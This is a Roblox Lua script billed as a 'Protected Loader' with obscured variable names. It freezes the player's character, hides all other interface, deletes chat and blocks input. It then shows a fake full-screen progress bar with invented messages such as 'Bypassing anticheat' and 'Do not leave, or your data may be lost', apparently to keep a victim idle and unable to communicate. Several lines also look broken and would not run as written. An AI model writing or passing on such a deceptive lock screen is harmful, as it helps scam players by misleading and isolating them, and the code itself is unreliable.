-- By:@g4sser_ | Protected Loader
local _,_,___=string,Instance,Vector2
local __,___,_=Enum,game:GetService,game:GetService("UserInputService")
local _,_,_L=__:GetService("Players"),__("TextChatService"),__(game,"CoreGui")
local _,playerGui=__:GetService("Players").LocalPlayer,__:GetService("Players").LocalPlayer:WaitForChild("PlayerGui")
pcall(function()playerGui:FindFirstChild("FullCoverLoading"):Destroy()end)

local function ___()
	local c=__:GetService("Players").LocalPlayer.Character or __:GetService("Players").LocalPlayer.CharacterAdded:Wait()
	local h=c and c:FindFirstChildOfClass("Humanoid")
	if h then h.WalkSpeed,h.JumpPower=0,0 end
end;___()
__:GetService("Players").LocalPlayer.CharacterAdded:Connect(___)

for _,g in ipairs(playerGui:GetChildren())do
	if g:IsA("ScreenGui") and g.Name~="FullCoverLoading"then g.Enabled=false end
end

playerGui.ChildAdded:Connect(function(v)
	if v:IsA("ScreenGui") and v.Name~="FullCoverLoading"then v.Enabled=false end
end)

pcall(function()_.ChatWindowConfiguration.Enabled=false if _L:FindFirstChild("Chat")then _L.Chat:Destroy()end end)
_L.ChildAdded:Connect(function(c)if c.Name=="Chat"then c:Destroy()end end)

local gui=Instance.new("ScreenGui")
gui.Name,gui.IgnoreGuiInset,gui.ZIndexBehavior,gui.DisplayOrder,gui.ResetOnSpawn,gui.Parent="FullCoverLoading",true,Enum.ZIndexBehavior.Global,999999,false,playerGui

local base=Instance.new("Frame")
base.Name,base.AnchorPoint,base.Position,base.Size,base.BackgroundColor3,base.BorderSizePixel,base.Parent="FullBlack",___(0,0),UDim2.new(0,0,0,0),UDim2.new(1,0,1,0),Color3.new(),0,gui

for _=1,15 do
	local b=Instance.new("Frame",base)
	b.Size=UDim2.new(0,math.random(60,120),0,math.random(60,120))
	b.Position=UDim2.new(math.random(),0,math.random(),0)
	b.BackgroundColor3=Color3.fromRGB(math.random(50,100),math.random(50,100),math.random(50,100))
	b.BackgroundTransparency,b.Rotation,b.BorderSizePixel=0.8,math.random(0,360),0
	Instance.new("UICorner",b).CornerRadius=UDim.new(0,math.random(20,60))
	task.spawn(function()
		while true do
			b:TweenPosition(UDim2.new(math.random(),0,math.random(),0),"InOut","Sine",4,true)
			b:TweenSize(UDim2.new(0,math.random(60,120),0,math.random(60,120)),"InOut","Sine",4,true)
			task.wait(4)
		end
	end)
end

local txt=Instance.new("TextLabel",base)
txt.Size,txt.Position,txt.BackgroundTransparency=UDim2.new(1,0,0.1,0),UDim2.new(0,0,0.4,0),1
txt.Font,txt.TextScaled,txt.TextColor3=Enum.Font.GothamSemibold,true,Color3.new(1,1,1)
txt.TextStrokeTransparency=0.5
txt.Text="⏳ Loading... 0%\t\t\tBy:@g4sser_"

local msg=Instance.new("TextLabel",base)
msg.Size,msg.Position,msg.BackgroundTransparency=UDim2.new(1,0,0.05,0),UDim2.new(0,0,0.5,0),1
msg.Font,msg.TextScaled,msg.TextColor3=Enum.Font.Gotham,true,Color3.fromRGB(170,170,170)
msg.Text="Bypassing anticheat..."

local warn=Instance.new("TextLabel",base)
warn.Size,warn.Position,warn.BackgroundTransparency=UDim2.new(1,0,0.05,0),UDim2.new(0,0,0.57,0),1
warn.Font,warn.TextScaled,warn.TextColor3=Enum.Font.Gotham,true,Color3.fromRGB(255,60,60)
warn.Text="⚠️ Do not leave, or your data may be lost."

local barFrame=Instance.new("Frame",base)
barFrame.Size,barFrame.Position=UDim2.new(0.8,0,0.015,0),UDim2.new(0.1,0,0.66,0)
barFrame.BackgroundColor3,barFrame.BackgroundTransparency,barFrame.BorderSizePixel=Color3.fromRGB(40,40,40),0.3,0
Instance.new("UICorner",barFrame).CornerRadius=UDim.new(0,8)

local bar=Instance.new("Frame",barFrame)
bar.Size,bar.BackgroundColor3,bar.BorderSizePixel=UDim2.new(0,0,1,0),Color3.fromRGB(255,255,255),0
Instance.new("UICorner",bar).CornerRadius=UDim.new(0,8)

task.spawn(function()
	for i=1,99 do
		txt.Text="⏳ Loading... "..i.."%\t\t\tBy:@g4sser_"
		bar:TweenSize(UDim2.new(i/100,0,1,0),"Out","Quad",0.1,true)
		task.wait(120/99)
	end
	txt.Text="⏳ Loading... 99%\t\t\tBy:@g4sser_"
	msg.Text="Finding an old server, please wait"
	task.wait(300)
end)

task.spawn(function()
	while true do
		for d=1,3 do
			if msg.Text:find("Bypassing") then
				msg.Text="Bypassing anticheat"..string.rep(".",d)
			elseif msg.Text:find("Finding") then
				msg.Text="Finding an old server, please wait"..string.rep(".",d)
			end
			task.wait(0.5)
		end
	end
end)

_:Connect(function()return Enum.ContextActionResult.Sink end)

while true do task.wait(1) end
